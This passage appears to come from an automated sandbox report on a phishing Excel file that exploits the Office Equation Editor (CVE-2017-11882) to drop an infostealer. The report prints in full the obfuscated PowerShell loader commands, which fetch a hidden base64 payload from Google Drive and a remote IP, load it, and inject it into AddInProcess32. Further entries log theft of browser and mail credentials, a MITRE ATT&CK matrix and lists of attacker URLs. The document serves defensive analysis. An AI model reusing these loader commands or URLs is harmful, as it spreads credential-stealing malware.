[System.Convert]::From'+'Base64String(kFvbase64Reverse'+'d);kFvloadedAssembly = [Syste'+'m.Reflection.Assembly]::Load(kFvcommandBytes);kFvvaiMethod = [dnlib.IO.Home].GetMethod(gw0VAIgw0);kFvvaiMethod.Invoke(kFv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0AddInProcess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').RePlaCe('w5c',[StrInG][ChAR]124).RePlaCe('kFv','$').RePlaCe(([ChAR]103+[ChAR]119+[ChAR]48),[StrInG][ChAR]39) | & ((varIABLE '*Mdr*').Name[3,11,2]-JOin'')"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdrrnzpbwfnzvvybccrjya9iccrj2d3mgh0dhbzoi8vzhjpdmuuz29vz2xllicrj2nvjysnbs91yz9lehankydvcnq9zg93bmxvywqmawq9mufjvmdkskp2muy2dlm0c1vpewjusc1zrccrj3zvaejzd3vyigd3mdtrrnynkyd3zwjdbgllbnqgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2wnkydpzw50o2tgjysndmltyscrj2dlqnl0zxmgpsankydrrnz3zwjdbgllbnqujysnrg93bmxvywreyxrhkgtgdmltywdlvxjskttrrnzpbwfnzvrlehqgpsbbu3lzdgvtllrlehqurscrj25jb2rpbmddojpvvey4lkdldfn0cmlujysnzyhrrnzpbwfnzuj5dgvzkttrrnzzdgfydezsywcgpsbndza8pejbu0u2nf9tvefsvd4+z3cwo2tgdmvuzccrj0zsywcgpsbndza8pejbjysnu0u2nf9ftkq+pmd3mdtrrnzzdgfydeluzgunkyd4id0ga0z2aw1hz2vuzxh0lkluzgv4t2yoa0z2c3rhcnrgbgfnkttrricrj3zlbmrjbmrleca9igtgdmltywdlvgv4dc5jjysnbmrlee9mkgtgdmvuzezsjysnywcpo2tgdnn0yxj0sw5kzxgglwdlidaglscrj2enkyduzcbrrnzlbmrjbmrlecankyctz3qga0z2c3rhcnrjbmrledtrrnzzdgfydeluzgv4ics9igtgdnn0yxj0rmxhzy5mzw5ndgg7a0z2ymfzzty0tgvuz3roid0ga0z2zw5ksw5kzxgglsbrrnzzdgfydeluzgv4o2tgdmjhc2u2nenvbw1hbmqgpsbrrnzpbwfnzvrlehquu3vic3ryaw5nkgtgdnn0yxj0sw5kjysnzxgsigtgdmjhc2u2nexlbmd0ack7a0z2ymfzzty0umv2zxjzzwqgpsatam9pbiaoa0z2ymfzzty0q29tbwfuzc5ub0noyxjbcnjhesgpjysnihc1jysnyybgb3jfywnolu9iamvjdcb7igtgdl8gfslblteuli0oa0z2ymfzzty0q29tbwfuzc5mzw5ndggpxttrrnzjb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tjysnqmfzzty0u3ryaw5nkgtgdmjhc2u2nfjldmvyc2unkydkkttrrnzsb2fkzwrbc3nlbwjsesa9ifttexn0zscrj20uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqoa0z2y29tbwfuzej5dgvzkttrrnz2ywlnzxrob2qgpsbbzg5sawiusu8usg9tzv0ur2v0twv0ag9kkgd3mfzbswd3mck7a0z2dmfptwv0ag9klkludm9rzshrrnynkydudwxslcbakgd3mhr4dc5hywfhywjld21hzgftlzmxljenkyczlji3ms43mccrjzevlzpwdhrojysnz3cwlcbndzbkzscrj3nhdgl2ywrvz3cwlcbndzbkzscrj3nhdgl2ywrvz3cwlcbndzbkzxnhdgl2ywrvz3cwlcbndzbbzgrjblbyb2nlc3mzmmd3mcwgz3cwzgvzyxrpdmfkb2d3mcwgz3cwzgvzyxrpdmfkb2d3mcxndzbkzxnhdgl2ywrvjysnz3cwlgd3mgrlc2f0axzhjysnzg9ndzasz3cwzgvzyxrpdmfkb2d3mcxndzbkzxnhdgl2ywrvz3cwlgd3mgrlc2f0axzhzg9ndzasz3cwmwd3mcxndzbkzxnhdgl2ywrvz3cwkscrjyk7jykuumvqbgfdzsgndzvjjyxbu3rysw5hxvtdaefsxteynckuumvqbgfdzsgna0z2jywnjccplljlugxhq2uokftdaefsxtewmytbq2hbul0xmtkrw0noqvjdndgplfttdhjjbkddw0noqvjdmzkpihwgjiaokhzhcklbqkxficcqtwrykicplk5hbwvbmywxmswyxs1kt2lujycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('kfvimageurl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1aivgjjjv1f6vs4suoybnh-sd'+'vuhbywur gw0;kfv'+'webclient = new-object system.net.webcl'+'ient;kf'+'vima'+'gebytes = '+'kfvwebclient.'+'downloaddata(kfvimageurl);kfvimagetext = [system.text.e'+'ncoding]::utf8.getstrin'+'g(kfvimagebytes);kfvstartflag = gw0<<base64_start>>gw0;kfvend'+'flag = gw0<<ba'+'se64_end>>gw0;kfvstartinde'+'x = kfvimagetext.indexof(kfvstartflag);kf'+'vendindex = kfvimagetext.i'+'ndexof(kfvendfl'+'ag);kfvstartindex -ge 0 -'+'a'+'nd kfvendindex '+'-gt kfvstartindex;kfvstartindex += kfvstartflag.length;kfvbase64length = kfvendindex - kfvstartindex;kfvbase64command = kfvimagetext.substring(kfvstartind'+'ex, kfvbase64length);kfvbase64reversed = -join (kfvbase64command.tochararray()'+' w5'+'c foreach-object { kfv_ })[-1..-(kfvbase64command.length)];kfvcommandbytes = [system.convert]::from'+'base64string(kfvbase64reverse'+'d);kfvloadedassembly = [syste'+'m.reflection.assembly]::load(kfvcommandbytes);kfvvaimethod = [dnlib.io.home].getmethod(gw0vaigw0);kfvvaimethod.invoke(kfv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0addinprocess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').replace('w5c',[string][char]124).replace('kfv','$').replace(([char]103+[char]119+[char]48),[string][char]39) | & ((variable '*mdr*').name[3,11,2]-join'')"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdrrnzpbwfnzvvybccrjya9iccrj2d3mgh0dhbzoi8vzhjpdmuuz29vz2xllicrj2nvjysnbs91yz9lehankydvcnq9zg93bmxvywqmawq9mufjvmdkskp2muy2dlm0c1vpewjusc1zrccrj3zvaejzd3vyigd3mdtrrnynkyd3zwjdbgllbnqgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2wnkydpzw50o2tgjysndmltyscrj2dlqnl0zxmgpsankydrrnz3zwjdbgllbnqujysnrg93bmxvywreyxrhkgtgdmltywdlvxjskttrrnzpbwfnzvrlehqgpsbbu3lzdgvtllrlehqurscrj25jb2rpbmddojpvvey4lkdldfn0cmlujysnzyhrrnzpbwfnzuj5dgvzkttrrnzzdgfydezsywcgpsbndza8pejbu0u2nf9tvefsvd4+z3cwo2tgdmvuzccrj0zsywcgpsbndza8pejbjysnu0u2nf9ftkq+pmd3mdtrrnzzdgfydeluzgunkyd4id0ga0z2aw1hz2vuzxh0lkluzgv4t2yoa0z2c3rhcnrgbgfnkttrricrj3zlbmrjbmrleca9igtgdmltywdlvgv4dc5jjysnbmrlee9mkgtgdmvuzezsjysnywcpo2tgdnn0yxj0sw5kzxgglwdlidaglscrj2enkyduzcbrrnzlbmrjbmrlecankyctz3qga0z2c3rhcnrjbmrledtrrnzzdgfydeluzgv4ics9igtgdnn0yxj0rmxhzy5mzw5ndgg7a0z2ymfzzty0tgvuz3roid0ga0z2zw5ksw5kzxgglsbrrnzzdgfydeluzgv4o2tgdmjhc2u2nenvbw1hbmqgpsbrrnzpbwfnzvrlehquu3vic3ryaw5nkgtgdnn0yxj0sw5kjysnzxgsigtgdmjhc2u2nexlbmd0ack7a0z2ymfzzty0umv2zxjzzwqgpsatam9pbiaoa0z2ymfzzty0q29tbwfuzc5ub0noyxjbcnjhesgpjysnihc1jysnyybgb3jfywnolu9iamvjdcb7igtgdl8gfslblteuli0oa0z2ymfzzty0q29tbwfuzc5mzw5ndggpxttrrnzjb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tjysnqmfzzty0u3ryaw5nkgtgdmjhc2u2nfjldmvyc2unkydkkttrrnzsb2fkzwrbc3nlbwjsesa9ifttexn0zscrj20uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqoa0z2y29tbwfuzej5dgvzkttrrnz2ywlnzxrob2qgpsbbzg5sawiusu8usg9tzv0ur2v0twv0ag9kkgd3mfzbswd3mck7a0z2dmfptwv0ag9klkludm9rzshrrnynkydudwxslcbakgd3mhr4dc5hywfhywjld21hzgftlzmxljenkyczlji3ms43mccrjzevlzpwdhrojysnz3cwlcbndzbkzscrj3nhdgl2ywrvz3cwlcbndzbkzscrj3nhdgl2ywrvz3cwlcbndzbkzxnhdgl2ywrvz3cwlcbndzbbzgrjblbyb2nlc3mzmmd3mcwgz3cwzgvzyxrpdmfkb2d3mcwgz3cwzgvzyxrpdmfkb2d3mcxndzbkzxnhdgl2ywrvjysnz3cwlgd3mgrlc2f0axzhjysnzg9ndzasz3cwzgvzyxrpdmfkb2d3mcxndzbkzxnhdgl2ywrvz3cwlgd3mgrlc2f0axzhzg9ndzasz3cwmwd3mcxndzbkzxnhdgl2ywrvz3cwkscrjyk7jykuumvqbgfdzsgndzvjjyxbu3rysw5hxvtdaefsxteynckuumvqbgfdzsgna0z2jywnjccplljlugxhq2uokftdaefsxtewmytbq2hbul0xmtkrw0noqvjdndgplfttdhjjbkddw0noqvjdmzkpihwgjiaokhzhcklbqkxficcqtwrykicplk5hbwvbmywxmswyxs1kt2lujycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('kfvimageurl'+' = '+'gw0https://drive.google.'+'co'+'m/uc?exp'+'ort=download&id=1aivgjjjv1f6vs4suoybnh-sd'+'vuhbywur gw0;kfv'+'webclient = new-object system.net.webcl'+'ient;kf'+'vima'+'gebytes = '+'kfvwebclient.'+'downloaddata(kfvimageurl);kfvimagetext = [system.text.e'+'ncoding]::utf8.getstrin'+'g(kfvimagebytes);kfvstartflag = gw0<<base64_start>>gw0;kfvend'+'flag = gw0<<ba'+'se64_end>>gw0;kfvstartinde'+'x = kfvimagetext.indexof(kfvstartflag);kf'+'vendindex = kfvimagetext.i'+'ndexof(kfvendfl'+'ag);kfvstartindex -ge 0 -'+'a'+'nd kfvendindex '+'-gt kfvstartindex;kfvstartindex += kfvstartflag.length;kfvbase64length = kfvendindex - kfvstartindex;kfvbase64command = kfvimagetext.substring(kfvstartind'+'ex, kfvbase64length);kfvbase64reversed = -join (kfvbase64command.tochararray()'+' w5'+'c foreach-object { kfv_ })[-1..-(kfvbase64command.length)];kfvcommandbytes = [system.convert]::from'+'base64string(kfvbase64reverse'+'d);kfvloadedassembly = [syste'+'m.reflection.assembly]::load(kfvcommandbytes);kfvvaimethod = [dnlib.io.home].getmethod(gw0vaigw0);kfvvaimethod.invoke(kfv'+'null, @(gw0txt.aaaaabewmadam/31.1'+'3.271.70'+'1//:ptth'+'gw0, gw0de'+'sativadogw0, gw0de'+'sativadogw0, gw0desativadogw0, gw0addinprocess32gw0, gw0desativadogw0, gw0desativadogw0,gw0desativado'+'gw0,gw0desativa'+'dogw0,gw0desativadogw0,gw0desativadogw0,gw0desativadogw0,gw01gw0,gw0desativadogw0)'+');').replace('w5c',[string][char]124).replace('kfv','$').replace(([char]103+[char]119+[char]48),[string][char]39) | & ((variable '*mdr*').name[3,11,2]-join'')"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 8.2.powershell.exe.723ab28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.723ab28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.525088434.000000000723A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.626497727.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3984, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3136, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 8.2.powershell.exe.723ab28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.723ab28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.525088434.000000000723A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.626497727.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.628239471.00000000023C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3984, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3136, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 8.2.powershell.exe.723ab28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.723ab28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.525088434.000000000723A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.626497727.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3984, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3136, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information211
                  Scripting
                  Valid Accounts121
                  Windows Management Instrumentation
                  211
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  23
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts43
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  211
                  Process Injection
                  11
                  Deobfuscate/Decode Files or Information
                  1
                  Input Capture
                  24
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts121
                  Command and Scripting Interpreter
                  Logon Script (Windows)Logon Script (Windows)1
                  Obfuscated Files or Information
                  Security Account Manager421
                  Security Software Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts3
                  PowerShell
                  Login HookLogin Hook1
                  Install Root Certificate
                  NTDS1
                  Process Discovery
                  Distributed Component Object Model1
                  Input Capture
                  13
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading
                  LSA Secrets151
                  Virtualization/Sandbox Evasion
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Modify Registry
                  DCSync1
                  Remote System Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                  Virtualization/Sandbox Evasion
                  Proc Filesystem1
                  System Network Configuration Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                  Process Injection
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1540840 Sample: transferencia interbancaria... Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 21 other signatures 2->52 10 EXCEL.EXE 6 9 2->10         started        process3 file4 32 ~$transferencia in...ria_66579.xlam.xlsx, data 10->32 dropped 13 EQNEDT32.EXE 12 10->13         started        process5 dnsIp6 44 107.172.31.13, 49165, 49168, 80 AS-COLOCROSSINGUS United States 13->44 34 C:\Users\user\...\nightdatingloverxxx.vbs, Unicode 13->34 dropped 36 C:\Users\...36IGHTTTTMPDW-constraints[1].vbs, Unicode 13->36 dropped 82 Office equation editor establishes network connection 13->82 84 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->84 18 wscript.exe 1 13->18         started        file7 signatures8 process9 signatures10 54 Suspicious powershell command line found 18->54 56 Wscript starts Powershell (via cmd or directly) 18->56 58 Bypasses PowerShell execution policy 18->58 60 2 other signatures 18->60 21 powershell.exe 4 18->21         started        process11 signatures12 62 Suspicious powershell command line found 21->62 64 Obfuscated command line found 21->64 24 powershell.exe 12 5 21->24         started        process13 dnsIp14 38 drive.usercontent.google.com 142.250.186.97, 443, 49167 GOOGLEUS United States 24->38 40 drive.google.com 216.58.212.174, 443, 49166 GOOGLEUS United States 24->40 66 Installs new ROOT certificates 24->66 68 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 24->68 70 Writes to foreign memory regions 24->70 72 Injects a PE file into a foreign processes 24->72 28 AddInProcess32.exe 12 2 24->28         started        signatures15 process16 dnsIp17 42 ip-api.com 208.95.112.1, 49169, 80 TUT-ASUS United States 28->42 74 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 28->74 76 Tries to steal Mail credentials (via file / registry access) 28->76 78 Tries to harvest and steal browser information (history, passwords, etc) 28->78 80 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 28->80 signatures18

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  transferencia interbancaria_66579.xlam.xlsx63%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                  transferencia interbancaria_66579.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  https://account.dyn.com/0%URL Reputationsafe
                  http://crl.entrust.net/server1.crl00%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  http://ip-api.com0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://secure.comodo.com/CPS00%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  drive.google.com
                  216.58.212.174
                  truefalse
                    unknown
                    drive.usercontent.google.com
                    142.250.186.97
                    truefalse
                      unknown
                      ip-api.com
                      208.95.112.1
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://107.172.31.13/NIGHTTTTMPDW-constraints.vbstrue
                          unknown
                          http://107.172.31.13/madamwebaaaaa.txttrue
                            unknown
                            http://ip-api.com/line/?fields=hostingfalse
                            • URL Reputation: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.520246237.0000000003319000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://account.dyn.com/powershell.exe, 00000008.00000002.525088434.000000000723A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.626497727.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://crl.entrust.net/server1.crl0powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://ocsp.entrust.net03powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/powershell.exe, 00000008.00000002.520246237.0000000003319000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.520246237.0000000003319000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Licensepowershell.exe, 00000008.00000002.520246237.0000000003319000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://ip-api.comAddInProcess32.exe, 00000009.00000002.628239471.000000000244C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.628239471.0000000002430000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.628239471.0000000002391000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Iconpowershell.exe, 00000008.00000002.520246237.0000000003319000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://drive.google.compowershell.exe, 00000008.00000002.520246237.000000000242B000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://drive.usercontent.google.compowershell.exe, 00000008.00000002.520246237.000000000256C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000008.00000002.524750374.0000000004FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
